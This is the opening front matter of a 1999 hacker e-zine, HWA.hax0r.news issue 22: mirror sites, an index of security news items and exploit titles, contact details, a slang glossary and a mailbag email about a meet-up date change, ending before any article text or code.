[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 22 Volume 1 1999 June 26th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://packetstorm.harvard.edu/hwahaxornews/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * Note: * * This issue covers events from June 6th thru June 26th so don't be too * rough on me, I know this is a weekly production but I had to do 3 wks * in only a few days so forgive some of the bad formatting. * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #22 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #22 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. AntiOnline crosses the line...................................... 03.1 .. More Questions Raised about John Vranesevich and AntiOnline ..... 04.0 .. The Difficulties of Reporting the Underground.................... 05.0 .. Mitnick Demonstrations Deemed a Huge Success .................... 06.0 .. New Trojan/Virus, PrettyPark .................................... 06.1 .. The rampage continues ........................................... 07.0 .. Eight Arrested in California (Piracy)............................ 08.0 .. 278 Internet Cafes Disciplined .................................. 09.0 .. Forbidden Knowledge Issue #5 .................................... 10.0 .. f41th Issue 6 ................................................... 11.0 .. Antidote Vol2 Issue 7 ........................................... 12.0 .. Will the Allies Drop CyberBombs on Milosevic? ................... 13.0 .. Melissa Suspect Still not Charged ............................... 14.0 ..*ToorCon '99 Security Expo --------- DATE CHANGED! -----------.... 15.0 .. ISS Gets Free Advertising ....................................... 16.0 .. Accounting Firms also get Free Advertising ...................... 17.0 .. Analyzer Starts Computer Security Business ...................... 18.0 .. $2.9Bil in Piracy in The US...................................... 19.0 .. Congress and NSA tangle over Echelon............................. 20.0 .. Emutronix Phone Hacking Products releases new Mach emulator...... 21.0 .. Is That Spelled With a "PH" or an "F" ........................... 22.0 .. The Demonizing of the Hacker .................................... 23.0 .. More Email Worms/Trojan ......................................... 24.0 .. Stanford Searches for "Hacker" .................................. 25.0 .. Mitnick Demo Pictures now Available.............................. 26.0 .. Does Cracking Affect Consumer Confidence? ....................... 27.0 .. Worm.ExploreZip is Causing Massive Damage ....................... 28.0 .. Don't Forget About BackDoor-G, it is Still Around ............... 29.0 .. MS Antritrust Trial Looks at Security ........................... 30.0 .. Web Defacements Hindering Open Government ....................... 31.0 .. Worm.ExploreZip Continues its Rampage ........................... 32.0 .. Senate web site hacked again(!).................................. 33.0 .. Mitnick Sentencing Hearing Rescheduled .......................... 34.0 .. Russia Looks to Beef Up its Version of Echelon................... 35.0 .. Company Claims CyberAttack by Competitor ........................ 36.0 .. LA set to Allow Internet Voting ................................. 37.0 .. CCC Camp Shapes Up .............................................. 38.0 .. Hong Kong Makes Major Piracy Bust ............................... 39.0 .. Ernst & Young Profile ........................................... 40.0 .. What is Your Privacy Worth? ..................................... 41.0 .. BSA Tactics Condemned by UK ..................................... 42.0 .. US Allows 128bit SSL Into Japan ................................. 43.0 .. Terroist About to Cause Electronic Chaos ........................ 44.0 .. Major Remote Hole Found in IIS .................................. 45.0 .. Outlook Express 4.5 Email Bug ................................... 46.0 .. Major Pirates Convicted ......................................... 47.0 .. Fear of Y2K Raises Security Concerns ............................ 48.0 .. Israeli Banks Thwart Attempted Cyber Break-In ................... 49.0 .. Navy Wants Tighter Network Security ............................. 50.0 .. IIS Hole Continues to Make News/Fix Available ................... 51.0 .. World Braces for International Day of Action .................... 52.0 .. ECD Targets Mexican Government .................................. 53.0 .. Cyber Attacks in Australia Double ............................... 54.0 .. SmartCards Next Stop for Internet Crime ......................... 55.0 .. Internet Was Designed without Security .......................... 56.0 .. Original Apple I On the Auction Block ........................... 57.0 .. Microsoft Calls eEye Irresponsible .............................. 58.0 .. Has the FBI Overreacted? ....................................... 59.0 .. Printer at Spa War Compromised ................................. 60.0 .. Popular Singapore Sites Defaced ................................. 61.0 .. DOD Says its CRAP! (Mustn't be Scottish) ........................ 62.0 .. DOE Still Unsecure ............................................. 63.0 .. Terrorists Use the Net ......................................... 64.0 .. Beat the CIA at their own game? - crypto sculpture cracking ..... 65.0 .. Pirates of Silicon Valley ....................................... 66.0 .. .mil hacker cartoon ............................................. 67.0 .. If Software Breaks Who is Liable? . ............................. 68.0 .. Trinux Release 0.61 ............................................ 69.0 .. Australia Looks to Increase Local Police Powers ................ 70.0 .. Aussie Gov Downloads Porn ...................................... 71.0 .. Software Glitch or Security Breach ............................. 72.0 .. Viruses Cost Companies Big Dough ............................... 73.0 .. B4B0 Issue 8 Released. ......................................... 74.0 .. f41th Issue 7 .................................................. 75.0 .. DOD Considers New Network ...................................... 76.0 .. NCIS Calls For National Computer Crime Squad ................... 77.0 .. !Hispahack Found Not Guilty .................................... 78.0 .. asahi.com Defaced ............................................... 79.0 .. NSTAC Releases Reports ......................................... 80.0 .. FBI This Week .................................................. 81.0 .. Cartoon Hackers?? (From HNN rumours section) .................... 82.0 .. Nuke Labs Stand Down ........................................... 83.0 .. X-Force Down Under is Hiring ................................... 84.0 .. More Canadian RedBoxing from HackCanada with the RIO ............ 85.0 .. SecureMac is Now Open .......................................... 86.0 .. Microsoft Demands Privacy ...................................... 87.0 .. Pentium III has 46 Bugs ........................................ 88.0 .. 'War' Against FBI Continues .................................... 89.0 .. Singapore Officials Arrest Two ................................. 90.0 .. GSA Looking for IDS ............................................ 91.0 ..+Theres Money in them thar videos! (DEFCON WEBCAST) .............. 92.0 .. Kasparov Defaced? .............................................. 93.0 .. Russ Cooper Interview .......................................... 94.0 .. Thanks-CGI Defaced With Its Own Script ......................... 95.0 .. *ToorCon Date Changes --------- DATE CHANGE! ----------......... 96.0 .. Gov Vulnerable Due to Lack of Training ......................... 97.0 .. Need skewled in juarez?: Teeside University Offers Degree in Warez 98.0 ..+FREE DefCon WebCasts ........................................... 99.0 .. Old Modem Flaw Still Haunts Users ............................... (... some modem users may be disconnected at the end of this ezine ;) 100.0 .. Another government server cracked today ......................... 101.0 .. MailMan.cookie attack ........................................... 102.0 .. misfrag.c nasty piece of code from P.A.T.C.H .................... 103.0 .. Double-byte code vulnerability, MS Security Bulletin ............ 104.0 .. 50 Ways to defeat your IDS....................................... 105.0 .. 50 reasons IDS systems work by Ron Gula.......................... 106.0 .. June 15th: Bruce Schneier's Cryptogram........................... 107.0 .. pop.c pop-2, remote exploit by smiler............................ 108.0 .. afio: security hole in 'afio -P pgp' encrypted archives.......... 109.0 .. C-Mail SMTP Server Remote Buffer Overflow Exploit................ 110.0 .. CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability 111.0 .. The IIS4 eEye security advisory and threads as mentioned previously 112.0 .. BO server flooder sends random spoofed udp's to the attacker...... 113.0 .. frootcake.c revisited............................................. 114.0 .. gin.c spoofs packets containing + + + ATH0 which causes some modems to hang up 115.0 .. IIS Remote Exploit (injection code)............................... 116.0 .. ActiveX security revisited........................................ 117.0 .. denial of service attack against NT PDC from Win95 workstation.... 118.0 .. Microsoft win2k PASV vulnerability................................ 119.0 .. useradd -p stores cleartext passwords / shadow-980724............. 120.0 .. UID 65536 and shadow-19990307 root compromise..................... 121.0 .. big brother in your cc(!) ........................................ 122.0 .. TCP MD5 option problem (router DoS)............................... 123.0 .. tcpdump 3.4 bug? (DoS)........................................... 124.0 .. [ISN] A mouse that roars? ........................................ 125.0 .. [ISN] Product Review: NOVaSTOR DataSAFE........................... 126.0 .. [ISN] Technology a threat to right of privacy Silicon Valley...... =--------------------------------------------------------------------------= RUMOURS .Rumours from around and about, mainly HNN stuff (not hacked websites) AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. HA.HA .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls .......................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................Link http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 Link http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack Link http://www.ottawacitizen.com/business/ Link http://search.yahoo.com.sg/search/news_sg?p=hack Link http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack Link http://www.zdnet.com/zdtv/cybercrime/ Link http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) Link NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm Link http://freespeech.org/eua/ Electronic Underground Affiliation Link http://ech0.cjb.net ech0 Security Link http://axon.jccc.net/hir/ Hackers Information Report Link http://net-security.org Net Security Link http://www.403-security.org Daily news and security related site Link Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman Astral p0lix Vexx g0at security Ken pr0xy Astral and the #innerpulse, crew (innerpulse is back!) and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ PacketStorm Security's site has MOVED, update your links to http://packetstorm.harvard.edu/ ++ Spikeman's DoS site is no more, it has been removed from the Genocide2600 servers, there are no immediate plans to revive the site but Spike says he hasn't ruled out the possibility completely and has had an offer to host the site from another provider. Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ================================================================ Delivered-To: dok-cruciphux@dok.org Received: (qmail 11079 invoked from network); 14 Jun 1999 03:48:22 -0000 Received: from md.egroups.com (207.138.41.139) by physical.graffiti.datacrest.com with SMTP; 14 Jun 1999 03:48:22 -0000 Received: from [10.1.1.23] by md.egroups.com with NNFMP; 14 Jun 1999 04:48:18 -0000 Mailing-List: contact a-s_mag-owner@egroups.com X-Mailing-List: a-s_mag@egroups.com X-URL: http://www.egroups.com/list/a-s_mag/ Delivered-To: listsaver-egroups-a-s_mag@egroups.com Received: (qmail 3968 invoked by uid 7770); 14 Jun 1999 03:43:43 -0000 Received: from ah-img-2.compuserve.com (HELO hpamgaab.compuserve.com) (149.174.217.153) by vault.egroups.com with SMTP; 14 Jun 1999 03:43:43 -0000 Received: (from mailgate@localhost) by hpamgaab.compuserve.com (8.8.8/8.8.8/HP-1.5) id XAA29122 for a-s_mag@egroups.com; Sun, 13 Jun 1999 23:43:42 -0400 (EDT) Date: Sun, 13 Jun 1999 23:43:11 -0400 From: "Armageddon." Sender: "Armageddon." To: A-S subscribers Message-ID: <199906132343_MC2-793F-3C4B@compuserve.com> MIME-Version: 1.0 Content-Disposition: inline Subject: [a-s_mag] Important : A-S Meet-up date. Content-Type: text/plain; charset=ISO-8859-1 Hi, There has been a change to the date of the A-S meet-up, as you probablly read in A-S14 we said the date would be the 24th of July. This has had to be changed as its be discovered that its not actually going to clash with Compulsion as we planned. The new date is : 31st of July. I'll be re-uploading A-S14 correcting this in the magazine to soften the blow of readers who have the wrong date. Those who contacted us via email will all be contacted with the new details and posts will go out on the news groups and in as many other magazines that we know have readers who planned to attend as we can possibly get to. Sorry if this date change causes you problems, on the bright side however I can confirm that after the first A-S Meet-up we plan to hold one every month there after on the last Saturday of each month. In A-S15 we'll publish literally ALL the details we can find that you might need to know for the meet-up, including a selection of venues for accommodation and all their contact details. Cheers -Armageddon Editor of A-S Mag / HNC. http://www.antisocial.cjb.net http://www.hack-net.com ------------------------------------------------------------------------ Make the News Come to you! FREE email newsletters sent directly to your in-box USAToday, Forbes, Wired, and more. Sign-up NOW! http://clickhere.egroups.com/click/316 eGroups.com home: http://www.egroups.com/group/a-s_mag http://www.egroups.com - Simplifying group communications @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include 